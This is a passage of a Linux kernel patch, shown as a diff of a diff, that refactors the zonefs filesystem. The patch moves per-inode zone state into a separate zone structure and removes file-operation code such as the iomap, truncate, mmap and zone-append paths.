+-		if (!(zi->i_flags & ZONEFS_ZONE_ACTIVE)) {
+-			zi->i_flags |= ZONEFS_ZONE_ACTIVE;
++	if ((z->z_flags & ZONEFS_ZONE_OPEN) ||
++	    (z->z_wpoffset > 0 && z->z_wpoffset < z->z_capacity)) {
++		if (!(z->z_flags & ZONEFS_ZONE_ACTIVE)) {
++			z->z_flags |= ZONEFS_ZONE_ACTIVE;
+ 			atomic_inc(&sbi->s_active_seq_files);
+ 		}
+ 		return;
+@@ -62,18 +76,29 @@ static void zonefs_account_active(struct inode *inode)
+ 
+ out:
+ 	/* The zone is not active. If it was, update the active count */
+-	if (zi->i_flags & ZONEFS_ZONE_ACTIVE) {
+-		zi->i_flags &= ~ZONEFS_ZONE_ACTIVE;
++	if (z->z_flags & ZONEFS_ZONE_ACTIVE) {
++		z->z_flags &= ~ZONEFS_ZONE_ACTIVE;
+ 		atomic_dec(&sbi->s_active_seq_files);
+ 	}
+ }
+ 
+-static inline int zonefs_zone_mgmt(struct inode *inode, enum req_op op)
++/*
++ * Manage the active zone count. Called with zi->i_truncate_mutex held.
++ */
++void zonefs_inode_account_active(struct inode *inode)
+ {
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	int ret;
++	lockdep_assert_held(&ZONEFS_I(inode)->i_truncate_mutex);
+ 
+-	lockdep_assert_held(&zi->i_truncate_mutex);
++	return zonefs_account_active(inode->i_sb, zonefs_inode_zone(inode));
++}
++
++/*
++ * Execute a zone management operation.
++ */
++static int zonefs_zone_mgmt(struct super_block *sb,
++			    struct zonefs_zone *z, enum req_op op)
++{
++	int ret;
+ 
+ 	/*
+ 	 * With ZNS drives, closing an explicitly open zone that has not been
+@@ -83,201 +108,49 @@ static inline int zonefs_zone_mgmt(struct inode *inode, enum req_op op)
+ 	 * are exceeded, make sure that the zone does not remain active by
+ 	 * resetting it.
+ 	 */
+-	if (op == REQ_OP_ZONE_CLOSE && !zi->i_wpoffset)
++	if (op == REQ_OP_ZONE_CLOSE && !z->z_wpoffset)
+ 		op = REQ_OP_ZONE_RESET;
+ 
+-	trace_zonefs_zone_mgmt(inode, op);
+-	ret = blkdev_zone_mgmt(inode->i_sb->s_bdev, op, zi->i_zsector,
+-			       zi->i_zone_size >> SECTOR_SHIFT, GFP_NOFS);
++	trace_zonefs_zone_mgmt(sb, z, op);
++	ret = blkdev_zone_mgmt(sb->s_bdev, op, z->z_sector,
++			       z->z_size >> SECTOR_SHIFT, GFP_NOFS);
+ 	if (ret) {
+-		zonefs_err(inode->i_sb,
++		zonefs_err(sb,
+ 			   "Zone management operation %s at %llu failed %d\n",
+-			   blk_op_str(op), zi->i_zsector, ret);
++			   blk_op_str(op), z->z_sector, ret);
+ 		return ret;
+ 	}
+ 
+ 	return 0;
+ }
+ 
+-static inline void zonefs_i_size_write(struct inode *inode, loff_t isize)
++int zonefs_inode_zone_mgmt(struct inode *inode, enum req_op op)
+ {
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	lockdep_assert_held(&ZONEFS_I(inode)->i_truncate_mutex);
+ 
+-	i_size_write(inode, isize);
+-	/*
+-	 * A full zone is no longer open/active and does not need
+-	 * explicit closing.
+-	 */
+-	if (isize >= zi->i_max_size) {
+-		struct zonefs_sb_info *sbi = ZONEFS_SB(inode->i_sb);
+-
+-		if (zi->i_flags & ZONEFS_ZONE_ACTIVE)
+-			atomic_dec(&sbi->s_active_seq_files);
+-		zi->i_flags &= ~(ZONEFS_ZONE_OPEN | ZONEFS_ZONE_ACTIVE);
+-	}
++	return zonefs_zone_mgmt(inode->i_sb, zonefs_inode_zone(inode), op);
+ }
+ 
+-static int zonefs_read_iomap_begin(struct inode *inode, loff_t offset,
+-				   loff_t length, unsigned int flags,
+-				   struct iomap *iomap, struct iomap *srcmap)
++void zonefs_i_size_write(struct inode *inode, loff_t isize)
+ {
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	struct super_block *sb = inode->i_sb;
+-	loff_t isize;
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
+ 
+-	/*
+-	 * All blocks are always mapped below EOF. If reading past EOF,
+-	 * act as if there is a hole up to the file maximum size.
+-	 */
+-	mutex_lock(&zi->i_truncate_mutex);
+-	iomap->bdev = inode->i_sb->s_bdev;
+-	iomap->offset = ALIGN_DOWN(offset, sb->s_blocksize);
+-	isize = i_size_read(inode);
+-	if (iomap->offset >= isize) {
+-		iomap->type = IOMAP_HOLE;
+-		iomap->addr = IOMAP_NULL_ADDR;
+-		iomap->length = length;
+-	} else {
+-		iomap->type = IOMAP_MAPPED;
+-		iomap->addr = (zi->i_zsector << SECTOR_SHIFT) + iomap->offset;
+-		iomap->length = isize - iomap->offset;
+-	}
+-	mutex_unlock(&zi->i_truncate_mutex);
+-
+-	trace_zonefs_iomap_begin(inode, iomap);
+-
+-	return 0;
+-}
+-
+-static const struct iomap_ops zonefs_read_iomap_ops = {
+-	.iomap_begin	= zonefs_read_iomap_begin,
+-};
+-
+-static int zonefs_write_iomap_begin(struct inode *inode, loff_t offset,
+-				    loff_t length, unsigned int flags,
+-				    struct iomap *iomap, struct iomap *srcmap)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	struct super_block *sb = inode->i_sb;
+-	loff_t isize;
+-
+-	/* All write I/Os should always be within the file maximum size */
+-	if (WARN_ON_ONCE(offset + length > zi->i_max_size))
+-		return -EIO;
+-
+-	/*
+-	 * Sequential zones can only accept direct writes. This is already
+-	 * checked when writes are issued, so warn if we see a page writeback
+-	 * operation.
+-	 */
+-	if (WARN_ON_ONCE(zi->i_ztype == ZONEFS_ZTYPE_SEQ &&
+-			 !(flags & IOMAP_DIRECT)))
+-		return -EIO;
++	i_size_write(inode, isize);
+ 
+ 	/*
+-	 * For conventional zones, all blocks are always mapped. For sequential
+-	 * zones, all blocks after always mapped below the inode size (zone
+-	 * write pointer) and unwriten beyond.
++	 * A full zone is no longer open/active and does not need
++	 * explicit closing.
+ 	 */
+-	mutex_lock(&zi->i_truncate_mutex);
+-	iomap->bdev = inode->i_sb->s_bdev;
+-	iomap->offset = ALIGN_DOWN(offset, sb->s_blocksize);
+-	iomap->addr = (zi->i_zsector << SECTOR_SHIFT) + iomap->offset;
+-	isize = i_size_read(inode);
+-	if (iomap->offset >= isize) {
+-		iomap->type = IOMAP_UNWRITTEN;
+-		iomap->length = zi->i_max_size - iomap->offset;
+-	} else {
+-		iomap->type = IOMAP_MAPPED;
+-		iomap->length = isize - iomap->offset;
+-	}
+-	mutex_unlock(&zi->i_truncate_mutex);
+-
+-	trace_zonefs_iomap_begin(inode, iomap);
+-
+-	return 0;
+-}
+-
+-static const struct iomap_ops zonefs_write_iomap_ops = {
+-	.iomap_begin	= zonefs_write_iomap_begin,
+-};
+-
+-static int zonefs_read_folio(struct file *unused, struct folio *folio)
+-{
+-	return iomap_read_folio(folio, &zonefs_read_iomap_ops);
+-}
+-
+-static void zonefs_readahead(struct readahead_control *rac)
+-{
+-	iomap_readahead(rac, &zonefs_read_iomap_ops);
+-}
+-
+-/*
+- * Map blocks for page writeback. This is used only on conventional zone files,
+- * which implies that the page range can only be within the fixed inode size.
+- */
+-static int zonefs_write_map_blocks(struct iomap_writepage_ctx *wpc,
+-				   struct inode *inode, loff_t offset)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-
+-	if (WARN_ON_ONCE(zi->i_ztype != ZONEFS_ZTYPE_CNV))
+-		return -EIO;
+-	if (WARN_ON_ONCE(offset >= i_size_read(inode)))
+-		return -EIO;
+-
+-	/* If the mapping is already OK, nothing needs to be done */
+-	if (offset >= wpc->iomap.offset &&
+-	    offset < wpc->iomap.offset + wpc->iomap.length)
+-		return 0;
+-
+-	return zonefs_write_iomap_begin(inode, offset, zi->i_max_size - offset,
+-					IOMAP_WRITE, &wpc->iomap, NULL);
+-}
+-
+-static const struct iomap_writeback_ops zonefs_writeback_ops = {
+-	.map_blocks		= zonefs_write_map_blocks,
+-};
+-
+-static int zonefs_writepages(struct address_space *mapping,
+-			     struct writeback_control *wbc)
+-{
+-	struct iomap_writepage_ctx wpc = { };
+-
+-	return iomap_writepages(mapping, wbc, &wpc, &zonefs_writeback_ops);
+-}
+-
+-static int zonefs_swap_activate(struct swap_info_struct *sis,
+-				struct file *swap_file, sector_t *span)
+-{
+-	struct inode *inode = file_inode(swap_file);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	if (isize >= z->z_capacity) {
++		struct zonefs_sb_info *sbi = ZONEFS_SB(inode->i_sb);
+ 
+-	if (zi->i_ztype != ZONEFS_ZTYPE_CNV) {
+-		zonefs_err(inode->i_sb,
+-			   "swap file: not a conventional zone file\n");
+-		return -EINVAL;
++		if (z->z_flags & ZONEFS_ZONE_ACTIVE)
++			atomic_dec(&sbi->s_active_seq_files);
++		z->z_flags &= ~(ZONEFS_ZONE_OPEN | ZONEFS_ZONE_ACTIVE);
+ 	}
+-
+-	return iomap_swapfile_activate(sis, swap_file, span,
+-				       &zonefs_read_iomap_ops);
+ }
+ 
+-static const struct address_space_operations zonefs_file_aops = {
+-	.read_folio		= zonefs_read_folio,
+-	.readahead		= zonefs_readahead,
+-	.writepages		= zonefs_writepages,
+-	.dirty_folio		= filemap_dirty_folio,
+-	.release_folio		= iomap_release_folio,
+-	.invalidate_folio	= iomap_invalidate_folio,
+-	.migrate_folio		= filemap_migrate_folio,
+-	.is_partially_uptodate	= iomap_is_partially_uptodate,
+-	.error_remove_page	= generic_error_remove_page,
+-	.direct_IO		= noop_direct_IO,
+-	.swap_activate		= zonefs_swap_activate,
+-};
+-
+-static void zonefs_update_stats(struct inode *inode, loff_t new_isize)
++void zonefs_update_stats(struct inode *inode, loff_t new_isize)
+ {
+ 	struct super_block *sb = inode->i_sb;
+ 	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+@@ -310,63 +183,68 @@ static void zonefs_update_stats(struct inode *inode, loff_t new_isize)
+ }
+ 
+ /*
+- * Check a zone condition and adjust its file inode access permissions for
+- * offline and readonly zones. Return the inode size corresponding to the
+- * amount of readable data in the zone.
++ * Check a zone condition. Return the amount of written (and still readable)
++ * data in the zone.
+  */
+-static loff_t zonefs_check_zone_condition(struct inode *inode,
+-					  struct blk_zone *zone, bool warn,
+-					  bool mount)
++static loff_t zonefs_check_zone_condition(struct super_block *sb,
++					  struct zonefs_zone *z,
++					  struct blk_zone *zone)
+ {
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-
+ 	switch (zone->cond) {
+ 	case BLK_ZONE_COND_OFFLINE:
+-		/*
+-		 * Dead zone: make the inode immutable, disable all accesses
+-		 * and set the file size to 0 (zone wp set to zone start).
+-		 */
+-		if (warn)
+-			zonefs_warn(inode->i_sb, "inode %lu: offline zone\n",
+-				    inode->i_ino);
+-		inode->i_flags |= S_IMMUTABLE;
+-		inode->i_mode &= ~0777;
+-		zone->wp = zone->start;
+-		zi->i_flags |= ZONEFS_ZONE_OFFLINE;
++		zonefs_warn(sb, "Zone %llu: offline zone\n",
++			    z->z_sector);
++		z->z_flags |= ZONEFS_ZONE_OFFLINE;
+ 		return 0;
+ 	case BLK_ZONE_COND_READONLY:
+ 		/*
+-		 * The write pointer of read-only zones is invalid. If such a
+-		 * zone is found during mount, the file size cannot be retrieved
+-		 * so we treat the zone as offline (mount == true case).
+-		 * Otherwise, keep the file size as it was when last updated
+-		 * so that the user can recover data. In both cases, writes are
+-		 * always disabled for the zone.
++		 * The write pointer of read-only zones is invalid, so we cannot
++		 * determine the zone wpoffset (inode size). We thus keep the
++		 * zone wpoffset as is, which leads to an empty file
++		 * (wpoffset == 0) on mount. For a runtime error, this keeps
++		 * the inode size as it was when last updated so that the user
++		 * can recover data.
+ 		 */
+-		if (warn)
+-			zonefs_warn(inode->i_sb, "inode %lu: read-only zone\n",
+-				    inode->i_ino);
+-		inode->i_flags |= S_IMMUTABLE;
+-		if (mount) {
+-			zone->cond = BLK_ZONE_COND_OFFLINE;
+-			inode->i_mode &= ~0777;
+-			zone->wp = zone->start;
+-			zi->i_flags |= ZONEFS_ZONE_OFFLINE;
+-			return 0;
+-		}
+-		zi->i_flags |= ZONEFS_ZONE_READONLY;
+-		inode->i_mode &= ~0222;
+-		return i_size_read(inode);
++		zonefs_warn(sb, "Zone %llu: read-only zone\n",
++			    z->z_sector);
++		z->z_flags |= ZONEFS_ZONE_READONLY;
++		if (zonefs_zone_is_cnv(z))
++			return z->z_capacity;
++		return z->z_wpoffset;
+ 	case BLK_ZONE_COND_FULL:
+ 		/* The write pointer of full zones is invalid. */
+-		return zi->i_max_size;
++		return z->z_capacity;
+ 	default:
+-		if (zi->i_ztype == ZONEFS_ZTYPE_CNV)
+-			return zi->i_max_size;
++		if (zonefs_zone_is_cnv(z))
++			return z->z_capacity;
+ 		return (zone->wp - zone->start) << SECTOR_SHIFT;
+ 	}
+ }
+ 
++/*
++ * Check a zone condition and adjust its inode access permissions for
++ * offline and readonly zones.
++ */
++static void zonefs_inode_update_mode(struct inode *inode)
++{
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++
++	if (z->z_flags & ZONEFS_ZONE_OFFLINE) {
++		/* Offline zones cannot be read nor written */
++		inode->i_flags |= S_IMMUTABLE;
++		inode->i_mode &= ~0777;
++	} else if (z->z_flags & ZONEFS_ZONE_READONLY) {
++		/* Readonly zones cannot be written */
++		inode->i_flags |= S_IMMUTABLE;
++		if (z->z_flags & ZONEFS_ZONE_INIT_MODE)
++			inode->i_mode &= ~0777;
++		else
++			inode->i_mode &= ~0222;
++	}
++
++	z->z_flags &= ~ZONEFS_ZONE_INIT_MODE;
++}
++
+ struct zonefs_ioerr_data {
+ 	struct inode	*inode;
+ 	bool		write;
+@@ -377,7 +255,7 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ {
+ 	struct zonefs_ioerr_data *err = data;
+ 	struct inode *inode = err->inode;
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
+ 	struct super_block *sb = inode->i_sb;
+ 	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+ 	loff_t isize, data_size;
+@@ -388,10 +266,9 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	 * as there is no inconsistency between the inode size and the amount of
+ 	 * data writen in the zone (data_size).
+ 	 */
+-	data_size = zonefs_check_zone_condition(inode, zone, true, false);
++	data_size = zonefs_check_zone_condition(sb, z, zone);
+ 	isize = i_size_read(inode);
+-	if (zone->cond != BLK_ZONE_COND_OFFLINE &&
+-	    zone->cond != BLK_ZONE_COND_READONLY &&
++	if (!(z->z_flags & (ZONEFS_ZONE_READONLY | ZONEFS_ZONE_OFFLINE)) &&
+ 	    !err->write && isize == data_size)
+ 		return 0;
+ 
+@@ -414,8 +291,9 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	 * In all cases, warn about inode size inconsistency and handle the
+ 	 * IO error according to the zone condition and to the mount options.
+ 	 */
+-	if (zi->i_ztype == ZONEFS_ZTYPE_SEQ && isize != data_size)
+-		zonefs_warn(sb, "inode %lu: invalid size %lld (should be %lld)\n",
++	if (zonefs_zone_is_seq(z) && isize != data_size)
++		zonefs_warn(sb,
++			    "inode %lu: invalid size %lld (should be %lld)\n",
+ 			    inode->i_ino, isize, data_size);
+ 
+ 	/*
+@@ -424,24 +302,22 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	 * zone condition to read-only and offline respectively, as if the
+ 	 * condition was signaled by the hardware.
+ 	 */
+-	if (zone->cond == BLK_ZONE_COND_OFFLINE ||
+-	    sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZOL) {
++	if ((z->z_flags & ZONEFS_ZONE_OFFLINE) ||
++	    (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZOL)) {
+ 		zonefs_warn(sb, "inode %lu: read/write access disabled\n",
+ 			    inode->i_ino);
+-		if (zone->cond != BLK_ZONE_COND_OFFLINE) {
+-			zone->cond = BLK_ZONE_COND_OFFLINE;
+-			data_size = zonefs_check_zone_condition(inode, zone,
+-								false, false);
+-		}
+-	} else if (zone->cond == BLK_ZONE_COND_READONLY ||
+-		   sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZRO) {
++		if (!(z->z_flags & ZONEFS_ZONE_OFFLINE))
++			z->z_flags |= ZONEFS_ZONE_OFFLINE;
++		zonefs_inode_update_mode(inode);
++		data_size = 0;
++	} else if ((z->z_flags & ZONEFS_ZONE_READONLY) ||
++		   (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZRO)) {
+ 		zonefs_warn(sb, "inode %lu: write access disabled\n",
+ 			    inode->i_ino);
+-		if (zone->cond != BLK_ZONE_COND_READONLY) {
+-			zone->cond = BLK_ZONE_COND_READONLY;
+-			data_size = zonefs_check_zone_condition(inode, zone,
+-								false, false);
+-		}
++		if (!(z->z_flags & ZONEFS_ZONE_READONLY))
++			z->z_flags |= ZONEFS_ZONE_READONLY;
++		zonefs_inode_update_mode(inode);
++		data_size = isize;
+ 	} else if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_RO &&
+ 		   data_size > isize) {
+ 		/* Do not expose garbage data */
+@@ -455,9 +331,8 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	 * close of the zone when the inode file is closed.
+ 	 */
+ 	if ((sbi->s_mount_opts & ZONEFS_MNTOPT_EXPLICIT_OPEN) &&
+-	    (zone->cond == BLK_ZONE_COND_OFFLINE ||
+-	     zone->cond == BLK_ZONE_COND_READONLY))
+-		zi->i_flags &= ~ZONEFS_ZONE_OPEN;
++	    (z->z_flags & (ZONEFS_ZONE_READONLY | ZONEFS_ZONE_OFFLINE)))
++		z->z_flags &= ~ZONEFS_ZONE_OPEN;
+ 
+ 	/*
+ 	 * If error=remount-ro was specified, any error result in remounting
+@@ -474,8 +349,8 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	 */
+ 	zonefs_update_stats(inode, data_size);
+ 	zonefs_i_size_write(inode, data_size);
+-	zi->i_wpoffset = data_size;
+-	zonefs_account_active(inode);
++	z->z_wpoffset = data_size;
++	zonefs_inode_account_active(inode);
+ 
+ 	return 0;
+ }
+@@ -487,9 +362,9 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+  * eventually correct the file size and zonefs inode write pointer offset
+  * (which can be out of sync with the drive due to partial write failures).
+  */
+-static void __zonefs_io_error(struct inode *inode, bool write)
++void __zonefs_io_error(struct inode *inode, bool write)
+ {
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
+ 	struct super_block *sb = inode->i_sb;
+ 	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+ 	unsigned int noio_flag;
+@@ -505,8 +380,8 @@ static void __zonefs_io_error(struct inode *inode, bool write)
+ 	 * files with aggregated conventional zones, for which the inode zone
+ 	 * size is always larger than the device zone size.
+ 	 */
+-	if (zi->i_zone_size > bdev_zone_sectors(sb->s_bdev))
+-		nr_zones = zi->i_zone_size >>
++	if (z->z_size > bdev_zone_sectors(sb->s_bdev))
++		nr_zones = z->z_size >>
+ 			(sbi->s_zone_sectors_shift + SECTOR_SHIFT);
+ 
+ 	/*
+@@ -518,7 +393,7 @@ static void __zonefs_io_error(struct inode *inode, bool write)
+ 	 * the GFP_NOIO context avoids both problems.
+ 	 */
+ 	noio_flag = memalloc_noio_save();
+-	ret = blkdev_report_zones(sb->s_bdev, zi->i_zsector, nr_zones,
++	ret = blkdev_report_zones(sb->s_bdev, z->z_sector, nr_zones,
+ 				  zonefs_io_error_cb, &err);
+ 	if (ret != nr_zones)
+ 		zonefs_err(sb, "Get inode %lu zone information failed %d\n",
+@@ -526,749 +401,6 @@ static void __zonefs_io_error(struct inode *inode, bool write)
+ 	memalloc_noio_restore(noio_flag);
+ }
+ 
+-static void zonefs_io_error(struct inode *inode, bool write)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-
+-	mutex_lock(&zi->i_truncate_mutex);
+-	__zonefs_io_error(inode, write);
+-	mutex_unlock(&zi->i_truncate_mutex);
+-}
+-
+-static int zonefs_file_truncate(struct inode *inode, loff_t isize)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	loff_t old_isize;
+-	enum req_op op;
+-	int ret = 0;
+-
+-	/*
+-	 * Only sequential zone files can be truncated and truncation is allowed
+-	 * only down to a 0 size, which is equivalent to a zone reset, and to
+-	 * the maximum file size, which is equivalent to a zone finish.
+-	 */
+-	if (zi->i_ztype != ZONEFS_ZTYPE_SEQ)
+-		return -EPERM;
+-
+-	if (!isize)
+-		op = REQ_OP_ZONE_RESET;
+-	else if (isize == zi->i_max_size)
+-		op = REQ_OP_ZONE_FINISH;
+-	else
+-		return -EPERM;
+-
+-	inode_dio_wait(inode);
+-
+-	/* Serialize against page faults */
+-	filemap_invalidate_lock(inode->i_mapping);
+-
+-	/* Serialize against zonefs_iomap_begin() */
+-	mutex_lock(&zi->i_truncate_mutex);
+-
+-	old_isize = i_size_read(inode);
+-	if (isize == old_isize)
+-		goto unlock;
+-
+-	ret = zonefs_zone_mgmt(inode, op);
+-	if (ret)
+-		goto unlock;
+-
+-	/*
+-	 * If the mount option ZONEFS_MNTOPT_EXPLICIT_OPEN is set,
+-	 * take care of open zones.
+-	 */
+-	if (zi->i_flags & ZONEFS_ZONE_OPEN) {
+-		/*
+-		 * Truncating a zone to EMPTY or FULL is the equivalent of
+-		 * closing the zone. For a truncation to 0, we need to
+-		 * re-open the zone to ensure new writes can be processed.
+-		 * For a truncation to the maximum file size, the zone is
+-		 * closed and writes cannot be accepted anymore, so clear
+-		 * the open flag.
+-		 */
+-		if (!isize)
+-			ret = zonefs_zone_mgmt(inode, REQ_OP_ZONE_OPEN);
+-		else
+-			zi->i_flags &= ~ZONEFS_ZONE_OPEN;
+-	}
+-
+-	zonefs_update_stats(inode, isize);
+-	truncate_setsize(inode, isize);
+-	zi->i_wpoffset = isize;
+-	zonefs_account_active(inode);
+-
+-unlock:
+-	mutex_unlock(&zi->i_truncate_mutex);
+-	filemap_invalidate_unlock(inode->i_mapping);
+-
+-	return ret;
+-}
+-
+-static int zonefs_inode_setattr(struct user_namespace *mnt_userns,
+-				struct dentry *dentry, struct iattr *iattr)
+-{
+-	struct inode *inode = d_inode(dentry);
+-	int ret;
+-
+-	if (unlikely(IS_IMMUTABLE(inode)))
+-		return -EPERM;
+-
+-	ret = setattr_prepare(&init_user_ns, dentry, iattr);
+-	if (ret)
+-		return ret;
+-
+-	/*
+-	 * Since files and directories cannot be created nor deleted, do not
+-	 * allow setting any write attributes on the sub-directories grouping
+-	 * files by zone type.
+-	 */
+-	if ((iattr->ia_valid & ATTR_MODE) && S_ISDIR(inode->i_mode) &&
+-	    (iattr->ia_mode & 0222))
+-		return -EPERM;
+-
+-	if (((iattr->ia_valid & ATTR_UID) &&
+-	     !uid_eq(iattr->ia_uid, inode->i_uid)) ||
+-	    ((iattr->ia_valid & ATTR_GID) &&
+-	     !gid_eq(iattr->ia_gid, inode->i_gid))) {
+-		ret = dquot_transfer(mnt_userns, inode, iattr);
+-		if (ret)
+-			return ret;
+-	}
+-
+-	if (iattr->ia_valid & ATTR_SIZE) {
+-		ret = zonefs_file_truncate(inode, iattr->ia_size);
+-		if (ret)
+-			return ret;
+-	}
+-
+-	setattr_copy(&init_user_ns, inode, iattr);
+-
+-	return 0;
+-}
+-
+-static const struct inode_operations zonefs_file_inode_operations = {
+-	.setattr	= zonefs_inode_setattr,
+-};
+-
+-static int zonefs_file_fsync(struct file *file, loff_t start, loff_t end,
+-			     int datasync)
+-{
+-	struct inode *inode = file_inode(file);
+-	int ret = 0;
+-
+-	if (unlikely(IS_IMMUTABLE(inode)))
+-		return -EPERM;
+-
+-	/*
+-	 * Since only direct writes are allowed in sequential files, page cache
+-	 * flush is needed only for conventional zone files.
+-	 */
+-	if (ZONEFS_I(inode)->i_ztype == ZONEFS_ZTYPE_CNV)
+-		ret = file_write_and_wait_range(file, start, end);
+-	if (!ret)
+-		ret = blkdev_issue_flush(inode->i_sb->s_bdev);
+-
+-	if (ret)
+-		zonefs_io_error(inode, true);
+-
+-	return ret;
+-}
+-
+-static vm_fault_t zonefs_filemap_page_mkwrite(struct vm_fault *vmf)
+-{
+-	struct inode *inode = file_inode(vmf->vma->vm_file);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	vm_fault_t ret;
+-
+-	if (unlikely(IS_IMMUTABLE(inode)))
+-		return VM_FAULT_SIGBUS;
+-
+-	/*
+-	 * Sanity check: only conventional zone files can have shared
+-	 * writeable mappings.
+-	 */
+-	if (WARN_ON_ONCE(zi->i_ztype != ZONEFS_ZTYPE_CNV))
+-		return VM_FAULT_NOPAGE;
+-
+-	sb_start_pagefault(inode->i_sb);
+-	file_update_time(vmf->vma->vm_file);
+-
+-	/* Serialize against truncates */
+-	filemap_invalidate_lock_shared(inode->i_mapping);
+-	ret = iomap_page_mkwrite(vmf, &zonefs_write_iomap_ops);
+-	filemap_invalidate_unlock_shared(inode->i_mapping);
+-
+-	sb_end_pagefault(inode->i_sb);
+-	return ret;
+-}
+-
+-static const struct vm_operations_struct zonefs_file_vm_ops = {
+-	.fault		= filemap_fault,
+-	.map_pages	= filemap_map_pages,
+-	.page_mkwrite	= zonefs_filemap_page_mkwrite,
+-};
+-
+-static int zonefs_file_mmap(struct file *file, struct vm_area_struct *vma)
+-{
+-	/*
+-	 * Conventional zones accept random writes, so their files can support
+-	 * shared writable mappings. For sequential zone files, only read
+-	 * mappings are possible since there are no guarantees for write
+-	 * ordering between msync() and page cache writeback.
+-	 */
+-	if (ZONEFS_I(file_inode(file))->i_ztype == ZONEFS_ZTYPE_SEQ &&
+-	    (vma->vm_flags & VM_SHARED) && (vma->vm_flags & VM_MAYWRITE))
+-		return -EINVAL;
+-
+-	file_accessed(file);
+-	vma->vm_ops = &zonefs_file_vm_ops;
+-
+-	return 0;
+-}
+-
+-static loff_t zonefs_file_llseek(struct file *file, loff_t offset, int whence)
+-{
+-	loff_t isize = i_size_read(file_inode(file));
+-
+-	/*
+-	 * Seeks are limited to below the zone size for conventional zones
+-	 * and below the zone write pointer for sequential zones. In both
+-	 * cases, this limit is the inode size.
+-	 */
+-	return generic_file_llseek_size(file, offset, whence, isize, isize);
+-}
+-
+-static int zonefs_file_write_dio_end_io(struct kiocb *iocb, ssize_t size,
+-					int error, unsigned int flags)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-
+-	if (error) {
+-		zonefs_io_error(inode, true);
+-		return error;
+-	}
+-
+-	if (size && zi->i_ztype != ZONEFS_ZTYPE_CNV) {
+-		/*
+-		 * Note that we may be seeing completions out of order,
+-		 * but that is not a problem since a write completed
+-		 * successfully necessarily means that all preceding writes
+-		 * were also successful. So we can safely increase the inode
+-		 * size to the write end location.
+-		 */
+-		mutex_lock(&zi->i_truncate_mutex);
+-		if (i_size_read(inode) < iocb->ki_pos + size) {
+-			zonefs_update_stats(inode, iocb->ki_pos + size);
+-			zonefs_i_size_write(inode, iocb->ki_pos + size);
+-		}
+-		mutex_unlock(&zi->i_truncate_mutex);
+-	}
+-
+-	return 0;
+-}
+-
+-static const struct iomap_dio_ops zonefs_write_dio_ops = {
+-	.end_io			= zonefs_file_write_dio_end_io,
+-};
+-
+-static ssize_t zonefs_file_dio_append(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	struct block_device *bdev = inode->i_sb->s_bdev;
+-	unsigned int max = bdev_max_zone_append_sectors(bdev);
+-	struct bio *bio;
+-	ssize_t size;
+-	int nr_pages;
+-	ssize_t ret;
+-
+-	max = ALIGN_DOWN(max << SECTOR_SHIFT, inode->i_sb->s_blocksize);
+-	iov_iter_truncate(from, max);
+-
+-	nr_pages = iov_iter_npages(from, BIO_MAX_VECS);
+-	if (!nr_pages)
+-		return 0;
+-
+-	bio = bio_alloc(bdev, nr_pages,
+-			REQ_OP_ZONE_APPEND | REQ_SYNC | REQ_IDLE, GFP_NOFS);
+-	bio->bi_iter.bi_sector = zi->i_zsector;
+-	bio->bi_ioprio = iocb->ki_ioprio;
+-	if (iocb_is_dsync(iocb))
+-		bio->bi_opf |= REQ_FUA;
+-
+-	ret = bio_iov_iter_get_pages(bio, from);
+-	if (unlikely(ret))
+-		goto out_release;
+-
+-	size = bio->bi_iter.bi_size;
+-	task_io_account_write(size);
+-
+-	if (iocb->ki_flags & IOCB_HIPRI)
+-		bio_set_polled(bio, iocb);
+-
+-	ret = submit_bio_wait(bio);
+-
+-	/*
+-	 * If the file zone was written underneath the file system, the zone
+-	 * write pointer may not be where we expect it to be, but the zone
+-	 * append write can still succeed. So check manually that we wrote where
+-	 * we intended to, that is, at zi->i_wpoffset.
+-	 */
+-	if (!ret) {
+-		sector_t wpsector =
+-			zi->i_zsector + (zi->i_wpoffset >> SECTOR_SHIFT);
+-
+-		if (bio->bi_iter.bi_sector != wpsector) {
+-			zonefs_warn(inode->i_sb,
+-				"Corrupted write pointer %llu for zone at %llu\n",
+-				wpsector, zi->i_zsector);
+-			ret = -EIO;
+-		}
+-	}
+-
+-	zonefs_file_write_dio_end_io(iocb, size, ret, 0);
+-	trace_zonefs_file_dio_append(inode, size, ret);
+-
+-out_release:
+-	bio_release_pages(bio, false);
+-	bio_put(bio);
+-
+-	if (ret >= 0) {
